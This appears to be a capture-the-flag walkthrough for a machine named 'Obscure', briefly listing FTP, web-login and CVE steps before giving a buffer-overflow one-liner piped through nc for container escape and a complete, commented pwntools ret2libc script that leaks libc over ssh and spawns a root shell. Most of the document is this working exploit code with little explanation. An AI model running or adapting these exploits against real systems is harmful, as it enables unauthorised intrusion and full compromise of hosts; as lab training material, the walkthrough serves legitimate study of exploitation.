Let’s talk about Obscure.
1. Connect to the FTP server as anonymous
Retrieve the password from the FTP server.
2. Log in to the webserver
Use the password to log in to the webserver; you also need to figure out the user's email address.
3. Exploit the webserver to get a shell
CVE-2017-10803 is a vulnerability in the webserver. Exploit it to get a shell.
4. Exploit the binary to escape from the container
Use this one-liner to get a shell on the host machine.
python -c 'print(b"A"*136 + b"\x47\x06\x40\x00")' > payload && cat payload - | nc 172.17.0.1 4444
5. Get root
And finally, using this exploit, perform a ret2libc attack to get root remotely. Transfer exploit_me and /lib/x86_64-linux-gnu/libc.so.6 to your machine and run the exploit script below.
from pwn import ELF, ROP, remote, log, p64, u64 , process, ssh
# --- Remote session and local artefacts -------------------------------------
# The ret2libc chain is driven against /exploit_me on the target over ssh,
# while symbol, GOT and gadget lookups use the copies of exploit_me and
# libc.so.6 that were transferred to the attacking machine (see the text above).
user = "zeeshan"
keyfile= "id_rsa"  # ssh private key, path relative to the current directory
port = 22
HOST = "10.10.xxx.xxx"  # placeholder -- fill in the target machine's address
s = ssh(host=HOST, user=user, keyfile=keyfile, port=port)
LOCAL_BIN = "./exploit_me"  # local copy of the target binary
LIBC = ELF("./libc.so.6")  # local copy of the remote libc; offsets below assume it matches exactly
P = s.process("/exploit_me")  # the vulnerable binary, started on the remote host via the ssh session
ELF_LOADED = ELF(LOCAL_BIN)  # parsed local copy: symbols, GOT entries and gadgets come from here
ENV = {"LD_PRELOAD": LIBC} if LIBC else {}  # NOTE(review): not referenced anywhere else in this script
ROP_LOADED = ROP(ELF_LOADED)  # gadget finder over the local binary
OFFSET = b"A"*40  # padding up to the saved return address -- presumably measured beforehand; TODO confirm
libc_func = "puts"  # imported libc function whose GOT entry is leaked to compute the libc base
PUTS_PLT = ELF_LOADED.symbols["puts"]  # call target for the leak; NOTE(review): confirm it equals ELF_LOADED.plt["puts"]
MAIN_PLT = ELF_LOADED.symbols['main']  # despite the name, the address of main itself (not a PLT entry); the leak chain returns here so a second chain can be sent
POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0]  # loads the first call argument (x86-64 SysV ABI)
RET = (ROP_LOADED.find_gadget(['ret']))[0]  # lone `ret`, used by generate_payload_aligned for padding
log.info("Main start: " + hex(MAIN_PLT))
log.info("Puts plt: " + hex(PUTS_PLT))
log.info("pop rdi; ret gadget: " + hex(POP_RDI))
log.info("ret gadget: " + hex(RET))
def generate_payload_aligned(rop):
    """Prefix *rop* with OFFSET, padding to a 16-byte multiple where possible.

    If ``OFFSET + rop`` is not a multiple of 16 bytes, a lone ``ret`` gadget is
    inserted between the padding and the chain, which shifts it by 8 bytes.
    When neither variant is aligned the unpadded chain is returned and a
    warning is logged.

    Args:
        rop: the packed ROP chain to place after the padding.

    Returns:
        The full payload (padding, optional ``ret``, chain) as bytes.
    """
    unpadded = OFFSET + rop
    if len(unpadded) % 16 == 0:
        return unpadded
    # Inserting one extra `ret` moves the chain by 8 bytes.
    padded = OFFSET + p64(RET) + rop
    if len(padded) % 16 != 0:
        log.warning(f"I couldn't align the payload! Len: {len(unpadded)}")
        return unpadded
    log.info("Payload aligned successfully")
    return padded
def get_addr(libc_func):
    """Leak the runtime address of *libc_func* and rebase LIBC on it.

    First stage of the two-stage ret2libc: the chain calls puts() on the GOT
    entry of *libc_func* (printing the resolved libc address) and then returns
    into main so that a second chain can be sent to the restarted program.

    Args:
        libc_func: name of an imported libc function (here "puts").

    Returns:
        The leaked address as a hex string. As a side effect sets
        ``LIBC.address`` to the computed libc base.
    """
    FUNC_GOT = ELF_LOADED.got[libc_func]  # GOT slot that holds the resolved libc address
    log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
    # pop rdi; ret -> puts(FUNC_GOT) -> main: print the slot's contents, then restart main
    rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
    rop1 = generate_payload_aligned(rop1)
    P.recvuntil(b"!")  # wait for the program's prompt -- presumably a banner ending in "!"; TODO confirm
    P.sendline(rop1)
    P.recvline()  # skip one line before the leak -- presumably the program's echo of the input; TODO confirm
    recieved = P.recvline().strip()
    log.critical(f"Recieved: {recieved}")
    log.info(f"Recieved: {recieved}")  # same value logged twice (critical and info); harmless
    log.info(f"Len rop1: {len(rop1)}")
    # puts stops at the first NUL byte, so the leak is usually shorter than 8 bytes; pad before unpacking
    leak = u64(recieved.ljust(8, b"\x00"))
    log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}")
    # LIBC is always set at module level in this script, so the else branch is only
    # reached if that assignment is changed to None.
    if LIBC:
        LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
        # Sanity hint for the user: a libc mapping base is page-aligned, so low
        # hex digits other than 0 point at a mismatched local libc.
        print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
        log.info("LIBC base @ %s" % hex(LIBC.address))
    else:
        # No local libc: hand the session over so the user can identify it from the leak.
        print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
        P.interactive()
    return hex(leak)
# --- Stage 1: leak puts@libc and rebase LIBC ---------------------------------
get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
# --- Stage 2: system("/bin/sh") using addresses rebased on LIBC.address ------
BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
SYSTEM = LIBC.sym["system"]
EXIT = LIBC.sym["exit"]  # resolved and logged, but not placed on the chain (see rop2 below)
log.info("POP_RDI %s " % hex(POP_RDI))
log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM))
log.info("exit %s " % hex(EXIT))
# pop rdi; ret -> system("/bin/sh"). exit() is deliberately left off, so once the
# shell exits execution continues into whatever follows on the stack (likely a crash).
rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
rop2 = generate_payload_aligned(rop2)
print(P.clean())  # drain and show whatever the restarted main has printed so far
P.sendline(rop2)
P.interactive() #Interact with your shell :)